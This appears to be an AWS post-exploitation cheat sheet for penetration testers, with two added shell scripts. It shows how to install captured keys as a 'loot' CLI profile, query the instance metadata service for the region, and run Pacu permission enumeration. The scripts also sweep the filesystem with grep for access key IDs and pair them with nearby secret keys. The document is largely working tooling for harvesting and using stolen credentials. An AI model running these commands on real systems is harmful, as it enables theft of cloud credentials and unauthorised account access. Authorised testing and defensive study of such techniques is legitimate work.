AWS Pentesting

Post Exploitation

This is a good place to start if you've got credentials.

Set credentials for AWS cli

Add the credentials to ~/.aws/credentials. It should look something like this (the aws_session_token line is only needed for temporary credentials, whose access key ID starts with ASIA; for long-term AKIA keys leave it out):

[default]
aws_access_key_id=AKIAIOSFODNN7EXAMPLE
aws_secret_access_key=wJalrXUtnFEMI/K7MDENG/bPxRfiCYEXAMPLEKEY
aws_session_token=AQoDYXdzEJr...<remainder of security token>

Make sure to set the proper region as well in ~/.aws/config. On the compromised instance you can read it from the instance identity document served by the metadata service. The plain request below only works where IMDSv1 is still enabled; an IMDSv2-only instance answers 401 until you first obtain a session token with a PUT to /latest/api/token and send it in the X-aws-ec2-metadata-token header:

curl http://169.254.169.254/latest/dynamic/instance-identity/document

An alternative with wget:

wget -O - -q http://169.254.169.254/latest/dynamic/instance-identity/document

It should look something like this (the region will obviously vary):

[default]
region = us-east-2
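
The whole setup as one script, added here as an example and not part of the original notes: it renders the two stanzas, pulls the region out of the identity document (IMDSv2 token first, IMDSv1 fallback) and, in live mode, appends the stanzas under a named profile and checks the key with sts get-caller-identity, which needs no IAM permissions and is the real test that a key works. The profile name loot, the LOOT_* environment variables and the sample document are assumptions of the example.

```shell
#!/bin/sh
# Added example (not from the original notes): set up an AWS CLI profile from
# looted keys. Profile name "loot", the LOOT_* variables and SAMPLE_DOC are
# assumptions of this example.

IMDS="http://169.254.169.254"

# ~/.aws/credentials stanza. The session token line is only emitted when a
# token is given: temporary ASIA* keys need it, long-term AKIA* keys have none.
credentials_stanza() {
    # $1 profile, $2 access key id, $3 secret key, $4 optional session token
    printf '[%s]\naws_access_key_id=%s\naws_secret_access_key=%s\n' "$1" "$2" "$3"
    if [ -n "${4:-}" ]; then
        printf 'aws_session_token=%s\n' "$4"
    fi
}

# ~/.aws/config stanza. Note the asymmetry: the default profile is [default]
# in both files, but a named profile is [loot] in credentials and
# [profile loot] in config, so pass "profile loot" as $1 for config.
config_stanza() {
    # $1 section name, $2 region
    printf '[%s]\nregion = %s\n' "$1" "$2"
}

# Fetch the identity document. Try IMDSv2 first (PUT for a token, then GET with
# the token header); if the PUT fails, fall back to the plain IMDSv1 GET.
fetch_identity_document() {
    token=$(curl -s -f -X PUT "$IMDS/latest/api/token" \
        -H "X-aws-ec2-metadata-token-ttl-seconds: 60" 2>/dev/null) || token=""
    if [ -n "$token" ]; then
        curl -s -f -H "X-aws-ec2-metadata-token: $token" \
            "$IMDS/latest/dynamic/instance-identity/document"
    else
        curl -s -f "$IMDS/latest/dynamic/instance-identity/document"
    fi
}

# Extract the "region" field from the JSON document on stdin without jq,
# which the instance may not have.
extract_region() {
    sed -n 's/.*"region"[[:space:]]*:[[:space:]]*"\([^"]*\)".*/\1/p' | head -n 1
}

# Constructed sample of the identity document (values made up, shape is real).
SAMPLE_DOC='{
  "accountId" : "123456789012",
  "availabilityZone" : "us-east-2a",
  "instanceId" : "i-0123456789abcdef0",
  "region" : "us-east-2",
  "version" : "2017-09-30"
}'

if [ "${1:-}" = "--live" ]; then
    # On the instance: LOOT_KEY_ID, LOOT_SECRET and optionally LOOT_TOKEN are
    # set by the operator beforehand. Append to, never overwrite, the two files.
    region=$(fetch_identity_document | extract_region)
    mkdir -p ~/.aws
    credentials_stanza loot "$LOOT_KEY_ID" "$LOOT_SECRET" "${LOOT_TOKEN:-}" >> ~/.aws/credentials
    config_stanza "profile loot" "$region" >> ~/.aws/config
    # The real validity check: an STS call that needs no IAM permissions.
    aws sts get-caller-identity --profile loot
else
    # Offline dry run against the constructed sample; prints what would be written.
    region=$(printf '%s\n' "$SAMPLE_DOC" | extract_region)
    credentials_stanza loot AKIAIOSFODNN7EXAMPLE wJalrXUtnFEMI/K7MDENG/bPxRfiCYEXAMPLEKEY
    config_stanza "profile loot" "$region"
fi
```

Run it with --live on the instance after exporting LOOT_KEY_ID and LOOT_SECRET (and LOOT_TOKEN for ASIA keys); without arguments it only prints the stanzas it would write, using the constructed document.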

Search for AWS keys in bash scripts

This only inspects *.sh files. Long-term access key IDs start with AKIA and temporary ones from STS start with ASIA; both are 20 characters, so the pattern matches either prefix followed by 16 more uppercase alphanumerics:

find / -name '*.sh' -exec grep -HE "([^A-Z0-9]|^)(AKIA|ASIA)[A-Z0-9]{16}" {} \; 2>/dev/null

Resource:
https://twitter.com/omespino/status/1242977678329819141?s=20

Pacu

Set the keys

This will import the keys from the default profile in ~/.aws/credentials (pass another profile name to import that one instead):

import_keys default

Set the region

This will set the region to us-east-2:

set_regions us-east-2

Show the active keys

This prints what Pacu has stored about the current key set; it does not call AWS, so it will not tell you whether the key is still valid. A module that hits the API, such as the permission enumeration below, is the real check:

whoami

List modules

ls

Run module

This will run a module to enumerate permissions the current account has:

run iam__enum_permissions

Search for access keys with grep

Run these from the directory you want to search. They match the shape of the two key parts rather than the AKIA/ASIA prefix, so expect false positives (any 20-character uppercase alphanumeric run for the first, any 40-character base64-looking run, such as a hex digest, for the second). A dot is used instead of * so that dot-directories such as .aws are searched as well.

Access key:

grep -RP '(?<![A-Z0-9])[A-Z0-9]{20}(?![A-Z0-9])' . 2>/dev/null

Secret access key:

grep -RP '(?<![A-Za-z0-9/+=])[A-Za-z0-9/+=]{40}(?![A-Za-z0-9/+=])' . 2>/dev/null

Resource:
https://gist.github.com/hsuh/88360eeadb0e8f7136c37fd46a62ee10
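
A hunter that combines both greps, added here as an example (not from the page or the linked gist): it finds AKIA/ASIA access key IDs anywhere under a directory, then looks within five lines of each hit for a 40-character secret-shaped token, which prunes most of the false positives the bare 40-character regex produces on its own. The sample tree it builds under mktemp is constructed for the demonstration; the key values are AWS's documented example keys.

```shell
#!/bin/sh
# Added example (not from the page or the gist): pair access key IDs with a
# nearby secret. Needs GNU grep for -P, like the greps above.

# Print the first secret-shaped token within 5 lines either side of line $2
# in file $1, or nothing if there is none.
find_secret_near() {
    awk -v s="$(($2 - 5))" -v e="$(($2 + 5))" 'NR >= s && NR <= e' "$1" \
      | grep -oP '(?<![A-Za-z0-9/+=])[A-Za-z0-9/+=]{40}(?![A-Za-z0-9/+=])' \
      | head -n 1
}

# Walk a tree for AKIA*/ASIA* access key IDs (dot-directories included, since
# grep -r does not skip them) and report each with the secret found next to it.
# Output: file:line key secret   (paths containing ':' are not handled).
scan_aws_keys() {
    grep -rnoP '(?<![A-Z0-9])(AKIA|ASIA)[A-Z0-9]{16}(?![A-Z0-9])' "$1" 2>/dev/null \
      | while IFS=: read -r file line key; do
            secret=$(find_secret_near "$file" "$line")
            printf '%s:%s %s %s\n' "$file" "$line" "$key" "${secret:-<no secret nearby>}"
        done
}

# Constructed sample tree: a credentials file with a full pair, a script with a
# temporary key but no secret, and a file holding a 40-hex-char digest that the
# bare secret regex would flag but the pairing ignores.
make_sample_tree() {
    d=$(mktemp -d)
    mkdir -p "$d/.aws" "$d/scripts"
    printf '[default]\naws_access_key_id = AKIAIOSFODNN7EXAMPLE\naws_secret_access_key = wJalrXUtnFEMI/K7MDENG/bPxRfiCYEXAMPLEKEY\n' \
        > "$d/.aws/credentials"
    printf '#!/bin/sh\nexport AWS_ACCESS_KEY_ID=ASIAIOSFODNN7EXAMPLE\n# secret comes from the env file\n' \
        > "$d/scripts/deploy.sh"
    printf 'no keys here, just a digest: 2fd4e1c67a2d28fced849ee1bb76e7391b93eb12\n' \
        > "$d/scripts/notes.txt"
    printf '%s\n' "$d"
}

# Usage: scan_aws_keys /path ; run with no arguments it demonstrates on the sample tree.
if [ -n "${1:-}" ]; then
    scan_aws_keys "$1"
else
    sample=$(make_sample_tree)
    scan_aws_keys "$sample"
    rm -rf "$sample"
fi
```

On the sample tree this reports the credentials file with its full pair and the deploy script with the ASIA key and no secret, and says nothing about notes.txt even though the bare secret regex would have flagged the digest in it.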